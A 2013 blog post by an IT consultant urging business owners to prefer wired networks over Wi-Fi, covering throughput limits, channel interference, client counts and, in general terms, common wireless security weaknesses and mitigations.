As of today, June 8 2013, my stance has not changed. If you value reliability and speed in an office environment of any significant size, USE WIRED connections! Wireless is no substitute. Useful Complement yes*, Substitute no. This is a no-brainer. Any " IT guy" professing otherwise should be immediately fired and clobbered with an Airport Express. This article is in fact targeted at you, gentle business owner, so you can make an informed decision.
Terminology:
WAP - Wireless Access Point. That bit of kit that has 2 or more antennas sticking out the rear.
802.11n - Wireless Networking standard. Transfers up to 150Mbits/second i.e. 15Mbytes/second. If you're very lucky.
10/100 Ethernet - Wired network standard where one can transfer up to 100Mbits/s, or 12.5MBytes/second.
10/100/1000 Ethernet - Wired network standard where one can transfer up to 1000Mbits, or 125MBytes/second.
Consider the following.
You move into a spanking new office lot. Your IT vendor goes in, does a site survey (that's a pretty rare occurence right there, but let's use our imagination), and says, "let's go 11n wireless!" Upon which you send a PO for one or more Wireless Access Points to said vendor. Come installation day vendor does speed test (that's another rare occurence), and you exclaim "300Mbps? I'm not even getting half of that!" You, dear business owner, have fallen victim to a vile lie...that of believing advertised specs.
Fact 1: There is no such thing a 300Mbps throughput by 300Mbps advertised equipment. It's a lie. It's a bigger lie than advertising a 2TB HDD that has only 1.8TB available (let's not go there just yet).
Fact 2: 300Mbps is *thereotical* output, not practical. Even assuming best case scenarios (assumption: no other WAP nearby to interfere, no other sources of interference, direct line of sight between client device and WAP, both adjacent to each other, no other devices sharing wireless), you're not going to get even half that. If you get 50% of theoretical, that'd be outstanding.
Fact 3: Wireless is a shared medium. 1 client device may get 150Mbps of throughput, 2 devices would get 75Mbps. 10 devices would get 15Mbps of bandwidth. That's almost as slow as networking technology in the early 90s. The only way to alleviate it is to have more WAPs eg 5 PCs on WAP1, the 2nd bunch of 5 PCs on WAP2, thus load balancing. However there is a problem. Wireless channels are very limited. Which brings me to:
Fact 4: Wireless channels are very limited. For the most popular 2.4ghz wireless band, there are only 3 distinct, non-overlapping channels..i.e. channel 1, 6 and 11 (to keeps things simple, Japan can use 1,5,9,14). 3 wireless channels for everyone. Once you start overlapping channels (i.e. putting channel 1 and 2 next to each other), you get what is known as Adjacent Channel Interference and performance is shot to hell. In fact, it's better to have to 2 APs sharing the same channel (eg both Channel 1) causing Co-Channel Interference, than to have different but overlapping channels. Co-Channel interference is anticipated and managed by design, and performance is maximized. Adjacent CI isn't. Details, read here (PDF) . Also, most WAPs have a setting called "Auto Channel Selection" or "Clear Channel Selection". This is utter rubbish and usually causes Adjacent Channel Interference! Do not use this! Take out your android smartphone, fire up Wifi Analyzer, and check which is the best signal for your location. Manually enter this channel number into your WAP. And check again in 6 mths time. If you have a choice, use the less popular and more expensive (for now) 5Ghz band. There are 23 non-overlapping channels to choose from. 5Ghz though has one major downside: it doesn't penetrate walls very well, so if you have a multistorey building, you may need multiple 5Ghz WAPs for full coverage. Still, you'll thank me for it.
Fact 5: WAPs are hopeless beyond 30 clients. Even with 30 clients, network bandwidth will be an issue for anything but the most basic tasks (internet/email).
Fact 6: A site survey may give a clean radio environment, NOW. At this very moment. However tomorrow you may have a new office opening up next to you, and they just happen to bring along 3 WAPs from their old office. If you're in any kind of multistorey commercial building, you could very well have 40 APs in radio range, all fighting for the same 3 channels in the 2.4Ghz range, or 23 channels in the 5ghz range.
Fact 7: Wireless performance depends on how polluted the radio environment is. And there is a LOT of competition for the 2.4ghz range. Cordless phones. Baby monitors. Motors. Microwave ovens (since that's the frequency best to excite water molecules). Bluetooth devices. All of these will conspire to make your wireless network slower than streamyx.
Fact 8: If you're doing file transfer regularly across the network, or opening files from a server, or running an accounting or any application off a network drive, wireless is not for you unless you're a zen master with unlimited patience. Just don't do it. The difference in speed can be ridiculously dramatic. What may take 1 minute on wireless could take 5 seconds on wired.
Fact 9: We've been talking about performance and reliablity thus far. But wireless is inherently LESS SECURE than wired. For someone to hack your wired network, they'd need to enter your office and physically plug in their sniffer. To hack your wireless network, they just need to exploit your misconfiguration from the adjacent office, or even up to a few hundred meters away from the main road. And believe me, hacking wireless networks is pretty easy. Let me count the ways:
- a) Open networks - running a WAP without having a password. Pretty rare nowadays, no one's that ignorant. Once upon a time, well intentioned folks left the APs open, so their neighbours could use it when they needed to. No good deed goes unpunished nowadays.
- b) Using WEP encryption - this is totally hacked, there are tools that can hack WEP password in less than a minute.
- c) Using WPA/TKIP encryption - hacked. Bit more difficult than b), but still do-able. Rainbow tables are making this easy.
- d) WPS - supposed to make joining to a wireless network easy, but made it easy for hackers too.
- e) AP SSID spoofing - hackers pretend that their rogue AP is yours.
- f) etc etc etc.
*For most normal networks, where you don't need to worry about alphabet soup compliance such as PCI-DSS and HIPPA, you can just use WPA2-PSK or WPA2-Enterprise (for now anyway). Easy to use, moderately secure.
For secure networks, that's not enough. The best practice in that scenario is to put APs into their own untrusted subnet, and use VPN to access office LAN resources. You layer on your security that way. Even if the WPA2 scheme was proven insecure, you'd still have VPN to protect your traffic.
Technologies available for wireless
802.11n - 5ghz - USE THIS frequency if you have a choice. Unfortunately, plenty of laptops aren't compatible with it. The good news is that newer devices like the Ipad2, Samsung S3, Galaxy tab are 5ghz compatible. Buy a AP that supports dual radio, not dual band. Dual radio allows the use of 5ghz and 2.4ghz simultaneously. Dual band, you pick one band. Dual radio = GOOD, future proofing.
802.11n - 2.4ghz - the defacto vanilla standard today
802.11g - 2.4ghz - dump these.
802.11a - 5ghz - Old and slow, but mostly reliable. Never caught on.
802.11b - Get rid of this device immediately, this screws up 11g and 11n transmission speeds.
Around the corner, 802.11ac draft standard (here we go again). No devices in market yet.
My background: Dealing with dozens of wireless setups by incompetent vendors who leave things in default. Starting messing with APs at Intel in 2000/2001 when Intel came out with their line of enterprise APs. Currently have a rooted android with firesheep and Wifi Kill. Purely as a teaching tool of course.
No comments:
Post a Comment